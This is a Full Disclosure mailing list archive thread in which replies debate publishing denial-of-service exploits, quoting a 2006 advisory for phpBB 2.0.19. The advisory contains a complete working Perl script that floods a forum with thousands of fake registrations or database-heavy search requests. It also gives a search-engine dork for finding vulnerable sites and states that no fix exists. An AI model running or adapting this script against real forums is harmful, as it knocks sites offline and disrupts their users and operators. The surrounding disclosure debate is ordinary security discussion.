Full Disclosure mailing list archives
RE: HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability
From: "Edward Pearson" <Ed () unityitservices co uk>
Date: Thu, 26 Jan 2006 15:46:08 -0000
No, I do believe full-disclosure to be the best method. In the case of DoS attacks, I think a point should be made of making sure the vendor is informed, and a patch available before disclosed, then I beleive itw down to the author's discretion when he releases the exploit, even if its a PoC. ________________________________ From: poo [mailto:skodliv () gmail com] Sent: 26 January 2006 11:31 To: Edward Pearson Cc: full-disclosure () lists grok org uk Subject: Re: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability so what youre saying is that DoS exploits shouldnt be disclosed? On 1/25/06, Edward Pearson <Ed () unityitservices co uk> wrote: The less said about DoS attacks the better. A tactic mostly employed by asexual teenagers who live in their parent's basement and call themselves "h4x0rz". ________________________________ From: full-disclosure-bounces () lists grok org uk [mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of h4cky0u Sent: 25 January 2006 14:44 To: full-disclosure () lists grok org uk Cc: bugtraq () securityfocus com Subject: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability ------------------------------------------------------ HYSA-2006-001 h4cky0u.org <http://h4cky0u.org/> Advisory 010 ------------------------------------------------------ Date - Wed Jan 25 2006 TITLE: ====== phpBB 2.0.19 search.php and profile.php DOS Vulnerability SEVERITY: ========= High SOFTWARE: ========= phpBB 2.0.19 and prior INFO: ===== phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites. Support Website : http://www.phpbb.com <http://www.phpbb.com/> BUG DESCRIPTION: ================ The bug was originally found by HaCkZaTaN of NeoSecurityteam. The original exploit code can be found at - http://h4cky0u.org/viewtopic.php?t=637 <http://h4cky0u.org/viewtopic.php?t=637> This one affected only versions uptill phpBB 2.0.15. The exploit code has been recoded which affects the latest version too. The bug resides in the following two scripts- profile.php << By registering as many users as you can. search.php << By searching in a way that the db cannot understand. Proof Of Concept Code: ====================== #!/usr/bin/perl ####################################### ## Recoded by: mix2mix and Elioni of http://ahg-khf.org <http://ahg-khf.org/> ## And h4cky0u Security Forums ( http://h4cky0u.org <http://h4cky0u.org/> ) ## Name: phpBBDoSReloaded ## Original Author: HaCkZaTaN of Neo Security Team ## Tested on phpBB 2.0.19 and earlier versions ## Ported to perl by g30rg3_x ## Date: 25/01/06 ####################################### use IO::Socket; ## Initialized X $x = 0; print q( phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN Recoded by Albanian Hackers Group & h4cky0u Security Forums ); print q(Host |without-> http://www.| ); $host = <STDIN>; chop ($host); print q(Path |example-> /phpBB2/ or /| ); $pth = <STDIN>; chop ($pth); print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| ); $type = <STDIN>; chop ($type); ## Tipi për regjistrim if($type == 1){ ## User Loop for 9999 loops (enough for Flood xDDDD) while($x != 9999) { ## Antari që regjistrohet automatikishtë "X" $uname = "username=AHG__" . "$x"; ## Emaili që regjistrohet ne bazën "X" $umail = "&email=AHG__" . "$x"; $postit = "$uname"."$umail"."%40ahg- crew.org&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0¬ifyreply=0¬ifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit "; $lrg = length $postit; my $sock = new IO::Socket::INET ( PeerAddr => "$host", PeerPort => "80", Proto => "tcp", ); die "\nNuk mundem te lidhemi me hostin sepse ësht dosirat ose nuk egziston: $!\n" unless $sock; ## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums print $sock "POST $pth"."profile.php HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n"; close($sock); ## Print a "+" for every loop syswrite STDOUT, "+"; $x++; } ## Tipi 2-shë për Kërkim(Flood) } elsif ($type == 2){ while($x != 9999) { ## Final Search String to Send $postit = "search_keywords=Albanian+Hackers+Group+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200"; ## Posit Length $lrg = length $postit; ## Connect Socket with Variables Provided By User my $sock = new IO::Socket::INET ( PeerAddr => "$host", PeerPort => "80", Proto => "tcp", ); die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; ## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8 ) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n"; close($sock); ## Print a "+" for every loop syswrite STDOUT, "+"; ## Increment X in One for every Loop $x++; } }else{ ## STF??? Qfarë keni Shtypur die "Mundësia nuk Lejohet +_-???\n"; } FIX: ==== No fix available as of date. GOOGLEDORK: =========== "Powered by phpBB" CREDITS: ======== - This vulnerability was discovered and researched by HaCkZaTaN of NeoSecurityteam. - Exploit recoded by mix2mix of [AHG-KHF] Security Team for the latest release of the script - Web : http://ahg-khf.org <http://ahg-khf.org/> mail : webmaster at ahg-khf dot org - Co Researcher - h4cky0u of h4cky0u Security Forums. mail : h4cky0u at gmail dot com web : http://www.h4cky0u.org <http://www.h4cky0u.org/> ORIGINAL ADVISORY: ================== http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt -- http://www.h4cky0u.org <http://www.h4cky0u.org/> (In)Security at its best... _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- smile tomorrow will be worse
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- RE: HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability Edward Pearson (Jan 25)
- <Possible follow-ups>
- RE: HYSA-2006-001 phpBB 2.0.19 search.php andprofile.php DOS Vulnerability Edward Pearson (Jan 26)